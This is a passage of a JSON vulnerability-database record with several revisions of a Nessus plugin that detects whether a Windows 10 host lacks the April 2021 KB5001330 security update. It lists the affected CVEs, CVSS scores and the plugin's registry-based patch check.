"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28332", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28339", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28437", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28328", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28321", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28348", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28343", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26416", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28349", "https://support.microsoft.com/en-us/help/5001330", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28324", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28345"], "cvelist": ["CVE-2021-26413", "CVE-2021-26415", "CVE-2021-26416", "CVE-2021-26417", "CVE-2021-27072", "CVE-2021-27079", "CVE-2021-27086", "CVE-2021-27088", "CVE-2021-27089", "CVE-2021-27090", "CVE-2021-27092", "CVE-2021-27093", "CVE-2021-27094", "CVE-2021-27095", "CVE-2021-27096", "CVE-2021-28309", "CVE-2021-28310", "CVE-2021-28311", "CVE-2021-28312", "CVE-2021-28313", "CVE-2021-28314", "CVE-2021-28315", "CVE-2021-28316", "CVE-2021-28317", "CVE-2021-28318", "CVE-2021-28319", "CVE-2021-28320", "CVE-2021-28321", "CVE-2021-28322", "CVE-2021-28323", "CVE-2021-28324", "CVE-2021-28325", "CVE-2021-28326", "CVE-2021-28327", "CVE-2021-28328", "CVE-2021-28329", "CVE-2021-28330", "CVE-2021-28331", "CVE-2021-28332", "CVE-2021-28333", "CVE-2021-28334", "CVE-2021-28335", "CVE-2021-28336", "CVE-2021-28337", "CVE-2021-28338", "CVE-2021-28339", "CVE-2021-28340", "CVE-2021-28341", "CVE-2021-28342", "CVE-2021-28343", "CVE-2021-28344", "CVE-2021-28345", "CVE-2021-28346", "CVE-2021-28347", "CVE-2021-28348", "CVE-2021-28349", "CVE-2021-28350", "CVE-2021-28351", "CVE-2021-28352", "CVE-2021-28353", "CVE-2021-28354", "CVE-2021-28355", "CVE-2021-28356", "CVE-2021-28357", "CVE-2021-28358", "CVE-2021-28434", "CVE-2021-28435", "CVE-2021-28436", "CVE-2021-28437", "CVE-2021-28438", "CVE-2021-28439", "CVE-2021-28440", "CVE-2021-28441", "CVE-2021-28442", "CVE-2021-28443", "CVE-2021-28444", "CVE-2021-28445", "CVE-2021-28446", "CVE-2021-28447"], "immutableFields": [], "lastseen": "2021-08-30T19:45:30", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["SMB_NT_MS21_APR_5001347.NASL", "SMB_NT_MS21_APR_5001342.NASL", "SMB_NT_MS21_APR_VISUAL_STUDIO.NASL", "SMB_NT_MS21_APR_5001339.NASL", "SMB_NT_MS21_APR_5001389.NASL", "SMB_NT_MS21_APR_5001337.NASL", "SMB_NT_MS21_APR_5001382.NASL", "SMB_NT_MS21_APR_5001340.NASL", "SMB_NT_MS21_APR_5001387.NASL", "SMB_NT_MS21_APR_5001335.NASL"]}, {"type": "kaspersky", "idList": ["KLA12139", "KLA12142"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:452CCDC1AEFFF7056148871E86A6FE26"]}, {"type": "attackerkb", "idList": ["AKB:007C4393-6621-4656-8BFD-D0CFE64DCD65"]}, {"type": "cve", "idList": ["CVE-2021-27088", "CVE-2021-28312", "CVE-2021-28442", "CVE-2021-26417", "CVE-2021-28441", "CVE-2021-27086", "CVE-2021-28314", "CVE-2021-28324", "CVE-2021-27090", "CVE-2021-28438"]}, {"type": "mskb", "idList": ["KB5001292", "KB5001330"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2021-26413/", "MSF:ILITIES/MSFT-CVE-2021-28440/", "MSF:ILITIES/MSFT-CVE-2021-27079/", "MSF:ILITIES/MSFT-CVE-2021-28325/", "MSF:ILITIES/MSFT-CVE-2021-28318/"]}], "modified": "2021-08-30T19:45:30", "rev": 2}, "score": {"value": 5.7, "vector": "NONE", "modified": "2021-08-30T19:45:30", "rev": 2}}, "objectVersion": "1.6", "pluginID": "149259", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149259);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/07/27\");\n\n script_cve_id(\n \"CVE-2021-26413\",\n \"CVE-2021-26415\",\n \"CVE-2021-26416\",\n \"CVE-2021-26417\",\n \"CVE-2021-27072\",\n \"CVE-2021-27079\",\n \"CVE-2021-27086\",\n \"CVE-2021-27088\",\n \"CVE-2021-27089\",\n \"CVE-2021-27090\",\n \"CVE-2021-27092\",\n \"CVE-2021-27093\",\n \"CVE-2021-27094\",\n \"CVE-2021-27095\",\n \"CVE-2021-27096\",\n \"CVE-2021-28309\",\n \"CVE-2021-28310\",\n \"CVE-2021-28311\",\n \"CVE-2021-28312\",\n \"CVE-2021-28313\",\n \"CVE-2021-28314\",\n \"CVE-2021-28315\",\n \"CVE-2021-28316\",\n \"CVE-2021-28317\",\n \"CVE-2021-28318\",\n \"CVE-2021-28319\",\n \"CVE-2021-28320\",\n \"CVE-2021-28321\",\n \"CVE-2021-28322\",\n \"CVE-2021-28323\",\n \"CVE-2021-28324\",\n \"CVE-2021-28325\",\n \"CVE-2021-28326\",\n \"CVE-2021-28327\",\n \"CVE-2021-28328\",\n \"CVE-2021-28329\",\n \"CVE-2021-28330\",\n \"CVE-2021-28331\",\n \"CVE-2021-28332\",\n \"CVE-2021-28333\",\n \"CVE-2021-28334\",\n \"CVE-2021-28335\",\n \"CVE-2021-28336\",\n \"CVE-2021-28337\",\n \"CVE-2021-28338\",\n \"CVE-2021-28339\",\n \"CVE-2021-28340\",\n \"CVE-2021-28341\",\n \"CVE-2021-28342\",\n \"CVE-2021-28343\",\n \"CVE-2021-28344\",\n \"CVE-2021-28345\",\n \"CVE-2021-28346\",\n \"CVE-2021-28347\",\n \"CVE-2021-28348\",\n \"CVE-2021-28349\",\n \"CVE-2021-28350\",\n \"CVE-2021-28351\",\n \"CVE-2021-28352\",\n \"CVE-2021-28353\",\n \"CVE-2021-28354\",\n \"CVE-2021-28355\",\n \"CVE-2021-28356\",\n \"CVE-2021-28357\",\n \"CVE-2021-28358\",\n \"CVE-2021-28434\",\n \"CVE-2021-28435\",\n \"CVE-2021-28436\",\n \"CVE-2021-28437\",\n \"CVE-2021-28438\",\n \"CVE-2021-28439\",\n \"CVE-2021-28440\",\n \"CVE-2021-28441\",\n \"CVE-2021-28442\",\n \"CVE-2021-28443\",\n \"CVE-2021-28444\",\n \"CVE-2021-28445\",\n \"CVE-2021-28446\",\n \"CVE-2021-28447\"\n );\n script_xref(name:\"MSKB\", value:\"5001330\");\n script_xref(name:\"IAVA\", value:\"2021-A-0168-S\");\n script_xref(name:\"MSFT\", value:\"MS21-5001330\");\n\n script_name(english:\"KB5001330: Windows 10 Version 2004 / Windows 10 Version 20H2 Security Update (April 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. Note that\nNessus has not tested for this issue but has instead relied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5001330\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released KB5001330 to address this issue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-27092\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nvar bulletin, kbs, share;\n\nbulletin = 'MS21-04';\nkbs = make_list(\n '5001330'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19041',\n rollup_date:'04_2021',\n bulletin:bulletin,\n rollup_kb_list:[5001330])\n||\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19042',\n rollup_date:'04_2021',\n bulletin:bulletin,\n rollup_kb_list:[5001330])\n)\n\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "cpe": ["cpe:/o:microsoft:windows"], "solution": "Microsoft has released KB5001330 to address this issue.", "nessusSeverity": "High", "cvssScoreSource": "CVE-2021-27092", "vpr": {"risk factor": "Critical", "score": "9.6"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2021-04-13T00:00:00", "vulnerabilityPublicationDate": "2021-04-13T00:00:00", "exploitableWith": []}, "lastseen": "2021-08-30T19:45:30", "differentElements": ["vpr"], "edition": 12}, {"bulletin": {"id": "SMB_NT_MS21_APR_5001330.NASL", "hash": "875a01d6d02ba8d414dbe931271c1ed4", "type": "nessus", "bulletinFamily": "scanner", "title": "KB5001330: Windows 10 Version 2004 / Windows 10 Version 20H2 Security Update (April 2021)", "description": "The remote Windows host is missing a security update. Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-05-05T00:00:00", "modified": "2021-07-27T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/149259", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27072", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28439", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28323", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27093", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28444", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28317", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28324", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27089", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28316", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28345", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28443", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28331", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28312", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28335", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28342", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28351", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28353", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28328", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28315", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28337", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26416", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28357", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27090", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28311", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28358", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28336", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28355", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28327", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28349", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28447", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28442", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28313", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28354", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26417", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28348", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27092", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28318", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28310", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28350", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28340", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28326", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27086", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28321", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28314", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28334", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28436", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26413", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28325", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28322", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26415", "https://support.microsoft.com/en-us/help/5001330", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28343", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28438", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28320", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28356", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28446", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28346", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28330", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28435", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28332", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27079", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28333", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28309", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27095", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28341", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27094", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28344", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28352", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27088", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27096", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28445", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28319", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28338", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28339", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28329", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28440", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28434", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28437", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28441", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28347"], "cvelist": ["CVE-2021-26413", "CVE-2021-26415", "CVE-2021-26416", "CVE-2021-26417", "CVE-2021-27072", "CVE-2021-27079", "CVE-2021-27086", "CVE-2021-27088", "CVE-2021-27089", "CVE-2021-27090", "CVE-2021-27092", "CVE-2021-27093", "CVE-2021-27094", "CVE-2021-27095", "CVE-2021-27096", "CVE-2021-28309", "CVE-2021-28310", "CVE-2021-28311", "CVE-2021-28312", "CVE-2021-28313", "CVE-2021-28314", "CVE-2021-28315", "CVE-2021-28316", "CVE-2021-28317", "CVE-2021-28318", "CVE-2021-28319", "CVE-2021-28320", "CVE-2021-28321", "CVE-2021-28322", "CVE-2021-28323", "CVE-2021-28324", "CVE-2021-28325", "CVE-2021-28326", "CVE-2021-28327", "CVE-2021-28328", "CVE-2021-28329", "CVE-2021-28330", "CVE-2021-28331", "CVE-2021-28332", "CVE-2021-28333", "CVE-2021-28334", "CVE-2021-28335", "CVE-2021-28336", "CVE-2021-28337", "CVE-2021-28338", "CVE-2021-28339", "CVE-2021-28340", "CVE-2021-28341", "CVE-2021-28342", "CVE-2021-28343", "CVE-2021-28344", "CVE-2021-28345", "CVE-2021-28346", "CVE-2021-28347", "CVE-2021-28348", "CVE-2021-28349", "CVE-2021-28350", "CVE-2021-28351", "CVE-2021-28352", "CVE-2021-28353", "CVE-2021-28354", "CVE-2021-28355", "CVE-2021-28356", "CVE-2021-28357", "CVE-2021-28358", "CVE-2021-28434", "CVE-2021-28435", "CVE-2021-28436", "CVE-2021-28437", "CVE-2021-28438", "CVE-2021-28439", "CVE-2021-28440", "CVE-2021-28441", "CVE-2021-28442", "CVE-2021-28443", "CVE-2021-28444", "CVE-2021-28445", "CVE-2021-28446", "CVE-2021-28447"], "immutableFields": [], "lastseen": "2021-09-10T23:46:03", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["SMB_NT_MS21_APR_5001339.NASL", "SMB_NT_MS21_APR_5001340.NASL", "SMB_NT_MS21_APR_5001347.NASL", "SMB_NT_MS21_APR_5001389.NASL", "SMB_NT_MS21_APR_5001387.NASL", "SMB_NT_MS21_APR_5001342.NASL", "SMB_NT_MS21_APR_VISUAL_STUDIO.NASL", "SMB_NT_MS21_APR_5001337.NASL", "SMB_NT_MS21_APR_5001382.NASL", "SMB_NT_MS21_APR_5001335.NASL"]}, {"type": "kaspersky", "idList": ["KLA12139", "KLA12142"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:452CCDC1AEFFF7056148871E86A6FE26"]}, {"type": "attackerkb", "idList": ["AKB:007C4393-6621-4656-8BFD-D0CFE64DCD65"]}, {"type": "cve", "idList": ["CVE-2021-28441", "CVE-2021-27092", "CVE-2021-28312", "CVE-2021-28314", "CVE-2021-28442", "CVE-2021-28355", "CVE-2021-27090", "CVE-2021-26416", "CVE-2021-27086", "CVE-2021-28324"]}, {"type": "mskb", "idList": ["KB5001292", "KB5001330"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2021-27079/", "MSF:ILITIES/MSFT-CVE-2021-28440/", "MSF:ILITIES/MSFT-CVE-2021-26413/", "MSF:ILITIES/MSFT-CVE-2021-28318/", "MSF:ILITIES/MSFT-CVE-2021-28325/"]}], "modified": "2021-09-10T23:46:03", "rev": 2}, "score": {"value": 5.7, "vector": "NONE", "modified": "2021-09-10T23:46:03", "rev": 2}}, "objectVersion": "1.6", "pluginID": "149259", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149259);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/07/27\");\n\n script_cve_id(\n \"CVE-2021-26413\",\n \"CVE-2021-26415\",\n \"CVE-2021-26416\",\n \"CVE-2021-26417\",\n \"CVE-2021-27072\",\n \"CVE-2021-27079\",\n \"CVE-2021-27086\",\n \"CVE-2021-27088\",\n \"CVE-2021-27089\",\n \"CVE-2021-27090\",\n \"CVE-2021-27092\",\n \"CVE-2021-27093\",\n \"CVE-2021-27094\",\n \"CVE-2021-27095\",\n \"CVE-2021-27096\",\n \"CVE-2021-28309\",\n \"CVE-2021-28310\",\n \"CVE-2021-28311\",\n \"CVE-2021-28312\",\n \"CVE-2021-28313\",\n \"CVE-2021-28314\",\n \"CVE-2021-28315\",\n \"CVE-2021-28316\",\n \"CVE-2021-28317\",\n \"CVE-2021-28318\",\n \"CVE-2021-28319\",\n \"CVE-2021-28320\",\n \"CVE-2021-28321\",\n \"CVE-2021-28322\",\n \"CVE-2021-28323\",\n \"CVE-2021-28324\",\n \"CVE-2021-28325\",\n \"CVE-2021-28326\",\n \"CVE-2021-28327\",\n \"CVE-2021-28328\",\n \"CVE-2021-28329\",\n \"CVE-2021-28330\",\n \"CVE-2021-28331\",\n \"CVE-2021-28332\",\n \"CVE-2021-28333\",\n \"CVE-2021-28334\",\n \"CVE-2021-28335\",\n \"CVE-2021-28336\",\n \"CVE-2021-28337\",\n \"CVE-2021-28338\",\n \"CVE-2021-28339\",\n \"CVE-2021-28340\",\n \"CVE-2021-28341\",\n \"CVE-2021-28342\",\n \"CVE-2021-28343\",\n \"CVE-2021-28344\",\n \"CVE-2021-28345\",\n \"CVE-2021-28346\",\n \"CVE-2021-28347\",\n \"CVE-2021-28348\",\n \"CVE-2021-28349\",\n \"CVE-2021-28350\",\n \"CVE-2021-28351\",\n \"CVE-2021-28352\",\n \"CVE-2021-28353\",\n \"CVE-2021-28354\",\n \"CVE-2021-28355\",\n \"CVE-2021-28356\",\n \"CVE-2021-28357\",\n \"CVE-2021-28358\",\n \"CVE-2021-28434\",\n \"CVE-2021-28435\",\n \"CVE-2021-28436\",\n \"CVE-2021-28437\",\n \"CVE-2021-28438\",\n \"CVE-2021-28439\",\n \"CVE-2021-28440\",\n \"CVE-2021-28441\",\n \"CVE-2021-28442\",\n \"CVE-2021-28443\",\n \"CVE-2021-28444\",\n \"CVE-2021-28445\",\n \"CVE-2021-28446\",\n \"CVE-2021-28447\"\n );\n script_xref(name:\"MSKB\", value:\"5001330\");\n script_xref(name:\"IAVA\", value:\"2021-A-0168-S\");\n script_xref(name:\"MSFT\", value:\"MS21-5001330\");\n\n script_name(english:\"KB5001330: Windows 10 Version 2004 / Windows 10 Version 20H2 Security Update (April 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. Note that\nNessus has not tested for this issue but has instead relied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5001330\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released KB5001330 to address this issue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-27092\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nvar bulletin, kbs, share;\n\nbulletin = 'MS21-04';\nkbs = make_list(\n '5001330'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19041',\n rollup_date:'04_2021',\n bulletin:bulletin,\n rollup_kb_list:[5001330])\n||\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19042',\n rollup_date:'04_2021',\n bulletin:bulletin,\n rollup_kb_list:[5001330])\n)\n\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "cpe": ["cpe:/o:microsoft:windows"], "solution": "Microsoft has released KB5001330 to address this issue.", "nessusSeverity": "High", "cvssScoreSource": "CVE-2021-27092", "vpr": {"risk factor": "Critical", "score": "9.5"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2021-04-13T00:00:00", "vulnerabilityPublicationDate": "2021-04-13T00:00:00", "exploitableWith": []}, "lastseen": "2021-09-10T23:46:03", "differentElements": ["sourceData"], "edition": 13}, {"bulletin": {"id": "SMB_NT_MS21_APR_5001330.NASL", "hash": "9e497a24174446b3a6145b91f731c48e", "type": "nessus", "bulletinFamily": "scanner", "title": "KB5001330: Windows 10 Version 2004 / Windows 10 Version 20H2 Security Update (April 2021)", "description": "The remote Windows host is missing a security update. Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-05-05T00:00:00", "modified": "2021-07-27T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/149259", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28438", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28444", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28342", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28324", 